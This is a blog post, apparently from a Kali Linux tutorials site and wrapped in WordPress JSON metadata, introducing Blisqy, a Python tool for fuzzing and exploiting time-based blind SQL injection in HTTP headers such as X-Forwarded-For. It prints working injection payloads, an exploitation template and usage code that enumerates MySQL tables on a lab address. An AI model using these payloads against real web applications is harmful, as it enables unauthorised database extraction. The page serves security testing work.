{"id":5536,"date":"2019-06-29T18:59:44","date_gmt":"2019-06-29T13:29:44","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=5536"},"modified":"2019-06-29T18:59:44","modified_gmt":"2019-06-29T13:29:44","slug":"blisqy-sql-injection-http-headers","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/","title":{"rendered":"Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers"},"content":{"rendered":"\n<p><strong>Blisqy<\/strong> is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability.<\/p>\n\n\n\n<p>The exploitation enables slow data siphon from a database (currently supports MySQL\/MariaDB only) using bitwise operation on printable ASCII characters, via a blind-SQL injection.<\/p>\n\n\n\n<p>For interoperability with other Python tools and to enable other users utilise the features provided in Blisqy, the modules herein can be imported into other Python based scripts.<\/p>\n\n\n\n<p>When testing for Time-based Blind SQL injections, any network lag or congestion can affect the effectiveness of your fuzzing or exploitation. <\/p>\n\n\n\n<p>To compensate for the possible network lags and uncertainties that might cause delays, Blisqy time comparison is dynamic and it&#8217;s calculated at runtime for each test. <\/p>\n\n\n\n<p>The tests utilizes&nbsp;<code>greenlet<\/code>(alight-weight cooperatively-scheduled execution unit) to provide a high-level synchronous API on top of&nbsp;<code>libevevent<\/code>&nbsp;loop. <\/p>\n\n\n\n<p>It provides a fast and efficient way of carrying out the payload tests in a short time, also, one particular test should not affect another because they are not fully done in a sequential method.<\/p>\n\n\n\n<p>It now supports fuzzing for Time-based Blind SQL Injection on HTTP Headers and the main functionalities (fuzzing and exploitation) separated to independent files for portability. <\/p>\n\n\n\n<p style=\"text-align:center\"><strong>Also Read &#8211; <a href=\"https:\/\/kalilinuxtutorials.com\/vulnx-vulnerabilities-cms\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"Vulnx : An Intelligent Bot Auto Shell Injector That Detect Vulnerabilities In Multiple Types Of CMS (opens in a new tab)\">Vulnx : An Intelligent Bot Auto Shell Injector That Detect Vulnerabilities In Multiple Types Of CMS<\/a><\/strong><\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Fuzzing with Blisqy<\/strong><\/p>\n\n\n\n<p>To use the Fuzzing functionality, import the following module in your Python script and provide a target along with the fuzzing data as shown below:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">from lib.blindfuzzer import blindSeeker<\/p>\n\n\n\n<p>Target parameters should be in a Dictionary\/JSON format, for example (<em>Note the variable data-types)<\/em>:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">Server = &#8216;192.168.56.101&#8217;<br>     Port = 80<br>     Index = 1<br>     Method = &#8216;GET&#8217;<br>     Headerfile = &#8220;fuzz-data\/headers\/default_headers.txt&#8221;<br>     Injectionfile = &#8220;fuzz-data\/payloads\/mysql_time.txt&#8221;<br>target_params = {<br>\n    &#8216;server&#8217;: Server,<br>\n    &#8216;port&#8217;: Port,<br>\n    &#8216;index&#8217;: Index,<br>\n    &#8216;headersFile&#8217;: Headerfile,<br>\n    &#8216;injectionFile&#8217;: Injectionfile,<br>\n    &#8216;method&#8217;: Method<br>\n}<\/p>\n\n\n\n<p>Invoking the fuzzer once the target parameters are provided is as shown below :<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">vulns = blindSeeker(target_params) <br>vulns.fuzz()<\/p>\n\n\n\n<p>You can checkout&nbsp;<code>FindBlindSpot.py<\/code>&nbsp;for this example provided.<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Sample Fuzzing Output<\/strong><\/p>\n\n\n\n<p>If you are successful, you should get a report of the &#8216;injectable&#8217; tests carried out. Please note, as much as Blisqy tries to compensate for network lags and congestion while testing it&#8217;s is important to proof-test the reported positive tests before proceeding.<\/p>\n\n\n\n<p>Below is a sample report:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">=================== [ Key Terms] ===================<br> Index = Configured Constant (Delay)<br> Base Index Record = Server Ping Before Fuzzing<br> Benching Record  = Base Index Record + Index<br> Fuzzing Record = Time taken to process request with Index<br>===================== [ Logic] =====================<br> If Fuzzing Record is greater than Benching Record,<br> treat as a positive; else, treat as a negative.<br><br>[+] Injection : X-Forwarded-For : &#8216; or sleep(1)#<br><br>[+] Header : X-Forwarded-For<br><br>[<em>] Index Record : 0.000160932540894 [<\/em>] Benching Record : 1.00016093254<br>[*] Fuzzing Record : 9.01<br>[!] Test 436 is Injectable.<br>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br>[+] Injection : X-Forwarded-For : &#8216; or sleep(1)=&#8217;<br>[+] Header : X-Forwarded-For<br><br>[<em>] Index Record : 0.000378847122192 [<\/em>] Benching Record : 1.00037884712<br>[*] Fuzzing Record : 18.02<br>[!] Test 438 is Injectable.<br>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Exploitation with Blisqy<\/strong><\/p>\n\n\n\n<p>After finding a potential Time-based Blind SQL injection, you can prepare a script to Exploit the vulnerable Web application.<\/p>\n\n\n\n<p>Just as the fuzzer, you can import the module for exploitation in your Python script and define a template for the exploitation operation. Below is an example of how to import the module in a Python script:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">from lib.blindexploit import SqlEngine<\/p>\n\n\n\n<p>Next, you will need to provide details of your target along with it&#8217;s target parameters for exploitation. Below is a sample implementation of exploiting the found blind sql injection found by the fuzzer:<\/p>\n\n\n\n<p>The target data should be in a Dictionary\/JSON format specifying the server, port, the found vulnerable header and it&#8217;s value (some applications will need or check for a certain value). Also&nbsp;<em>Note the variable data-types<\/em>.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">target = {<br>\n    &#8216;server&#8217;: &#8216;192.168.56.101&#8217;,<br>\n    &#8216;port&#8217;: 80,<br>\n    &#8216;vulnHeader&#8217;: &#8216;X-Forwarded-For&#8217;,<br>\n    &#8216;headerValue&#8217;: &#8216;fuzzer&#8217;<br>\n}<\/p>\n\n\n\n<p>Target parameters should follow allowing the user to specify some options related to the exploitation preferences.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">targetParam = {<br>\n    &#8216;sleepTime&#8217;: 0.1,<br>\n    &#8216;payload&#8217;: &#8216;pass&#8217;,<br>\n    &#8216;mysqlDig&#8217;: &#8216;yes&#8217;,<br>\n    &#8216;interactive&#8217;: &#8216;on&#8217;,<br>\n    &#8216;verbosity&#8217;: &#8216;high&#8217;<br>\n}<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>sleepTime<\/strong>&nbsp;is the delay to be used in the payloads<\/li><li><strong>payload<\/strong>&nbsp;is an option to run the exploitation with a custom SQL query e.g.&nbsp;<code>select @@hostname<\/code>. The default option is&nbsp;<code>'pass'<\/code>.<\/li><li><strong>mysqlDig<\/strong>&nbsp;enables the exploitation to be automatic and to enumerate all the available tables in the schema.<\/li><li><strong>interactive<\/strong>&nbsp;is an option to enable the user interact with the exploitation routine. This can be handy when you want to skip to the interesting parts of the DB.<\/li><li><strong>verbosity<\/strong>&nbsp;can be high, medium or low. This just controls the output information from the exploitation routine.<\/li><\/ul>\n\n\n\n<p>After providing your target and its parameters, the next thing to provide is a template for the exploitation routine. Blisqy provides a way users can specify where to inject the exfiltration SQL payload and the&nbsp;<code>sleeptime<\/code>&nbsp;delay. Below is an example of an implementation for one of the found vulnerabilities on the sample report provided in the previous subsection.<\/p>\n\n\n\n<p>Found injection on X-Forwarded-For header:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">&#8216; or sleep(1)=&#8217;<\/p>\n\n\n\n<p>Template for this particular injection:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">sqli = &#8220;&#8216; or if((*sql*),sleep(*time*),0) and &#8216;1&#8217;=&#8217;1&#8221;<\/p>\n\n\n\n<p>During runtime, the&nbsp;<code>*sql*<\/code>&nbsp;will be replaced with an SQL injection payload and&nbsp;<code>*time*<\/code>&nbsp;will be replaced with a delay for sleep().<\/p>\n\n\n\n<p>Once all these are done, the last part is to instantiate the exploitation routine and let the&nbsp;<code><strong>MysqlDigger()<\/strong><\/code>&nbsp;method do the working.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong># Create an instance <br><\/strong>BlindSql = SqlEngine(target, targetParam, sqli) <br><br><strong># Enumerate the MySql Database <br><\/strong>BlindSql.MysqlDigger()<\/p>\n\n\n\n<p>You can check&nbsp;<code>ExploitBlindSpot.py<\/code>&nbsp;for this example provided.<\/p>\n\n\n\n<p>Below is an example of an exploitation operation:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-vJPZrNiiZVs\/XRUIBGPjwTI\/AAAAAAAABH8\/p74oHUp324Ep8JC-7yZL-6I0QLtHMTlXwCLcBGAs\/s1600\/example.png\" alt=\"\"\/><\/figure>\n\n\n\n<div class=\"wp-block-button aligncenter is-style-squared\"><a class=\"wp-block-button__link has-background has-vivid-cyan-blue-background-color\" href=\"https:\/\/github.com\/JohnTroony\/Blisqy\"><strong>Download<\/strong><\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Blisqy is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability. The exploitation enables slow data siphon from a database (currently supports MySQL\/MariaDB only) using bitwise operation on printable ASCII characters, via a blind-SQL injection. For interoperability with other Python tools [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":15640,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png","fifu_image_alt":"Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[406,1552,3205],"class_list":["post-5536","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-blisqy","tag-http","tag-sql-injection"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers<\/title>\n<meta name=\"description\" content=\"Blisqy is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers\" \/>\n<meta property=\"og:description\" content=\"Blisqy is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2019-06-29T13:29:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers\",\"datePublished\":\"2019-06-29T13:29:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/\"},\"wordCount\":893,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png\",\"keywords\":[\"Blisqy\",\"http\",\"sql injection\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/\",\"name\":\"Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png\",\"datePublished\":\"2019-06-29T13:29:44+00:00\",\"description\":\"Blisqy is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/#primaryimage\",\"url\":\"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png\",\"contentUrl\":\"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers","description":"Blisqy is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/","og_locale":"en_US","og_type":"article","og_title":"Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers","og_description":"Blisqy is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability.","og_url":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2019-06-29T13:29:44+00:00","og_image":[{"url":"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers","datePublished":"2019-06-29T13:29:44+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/"},"wordCount":893,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png","keywords":["Blisqy","http","sql injection"],"articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/","url":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/","name":"Blisqy : Exploit Time-Based Blind-SQL Injection In HTTP-Headers","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png","datePublished":"2019-06-29T13:29:44+00:00","description":"Blisqy is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/blisqy-sql-injection-http-headers\/#primaryimage","url":"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png","contentUrl":"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/1.bp.blogspot.com\/-bcMN1ZSwQ3I\/XRUIBM2g7aI\/AAAAAAAABH4\/j7v3KOjiycMFkWQ7OllBlVbD9tr5XYrmQCLcBGAs\/s1600\/Screenshot%25281%2529.png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":4356,"url":"https:\/\/kalilinuxtutorials.com\/top-5-sql-injection-tools-for-pentest-hacking\/","url_meta":{"origin":5536,"position":0},"title":"Top 5 SQL Injection Tools for PenTest &amp; Hacking","author":"Pricilla","date":"April 5, 2019","format":false,"excerpt":"SQL injection is a code injection technique, used to attack data-driven applications that might destroy your database. Here, malicious codes are inserted into SQL statements via web page input. SQL injection is one of the most common web hacking techniques. Let's see the top 5 SQL injection tool to detect\u2026","rel":"","context":"In &quot;Hacking Tools&quot;","block_context":{"text":"Hacking Tools","link":"https:\/\/kalilinuxtutorials.com\/category\/hacking-tools\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":5941,"url":"https:\/\/kalilinuxtutorials.com\/best-open-source-sql-injection-tools\/","url_meta":{"origin":5536,"position":1},"title":"Top 7 Best Open Source SQL Injection Tools \u2013 2019","author":"R K","date":"July 26, 2019","format":false,"excerpt":"SQL injection is a standout amongst the most widely recognised attacks against web applications. Here is the list of Best SQL Injection Tools 2019. Its attacks comprise of insertion or \u201cinjection\u201d of a SQL query by means of the information from the customer to the application. An effective SQL injections\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1157,"url":"https:\/\/kalilinuxtutorials.com\/sql-injection\/","url_meta":{"origin":5536,"position":2},"title":"List of Best Open Source SQL Injection Tools &#8211; 2019","author":"R K","date":"June 25, 2018","format":false,"excerpt":"SQL injection is a standout amongst the most widely recognized attacks against web applications. Here is the list of Best SQL Injection Tools 2019. Its attacks comprise of insertion or \"injection\" of a SQL query by means of the information from the customer to the application. An effective SQL injections\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":5892,"url":"https:\/\/kalilinuxtutorials.com\/blisqy-blind-sql-injection\/","url_meta":{"origin":5536,"position":3},"title":"Blisqy : Exploit Time-based Blind-SQL Injection In HTTP-Headers","author":"R K","date":"July 22, 2019","format":false,"excerpt":"Leviathan is a mass audit toolkit which has wide range service discovery, brute force, SQL injection detection and running custom exploit capabilities. It consists open source tools such masscan, ncrack, dsss and gives you the flexibility of using them with a combination. The main goal of this project is auditing\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":30836,"url":"https:\/\/kalilinuxtutorials.com\/guide-ceh-practical-master\/","url_meta":{"origin":5536,"position":4},"title":"Guide-CEH-Practical-Master &#8211; Tools, Techniques And Exam Mastery","author":"Varshini","date":"October 13, 2023","format":false,"excerpt":"Welcome to the 'Guide-CEH-Practical-Master', your essential roadmap to mastering the Certified Ethical Hacker (Practical) exam. Dive deep into the tools, techniques, and insights necessary for success. Let's embark on this journey to achieve professional cybersecurity prowess together Exame Details Exam Title: Certified Ethical Hacker (Practical) Number of Practical Challenges: 20\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber 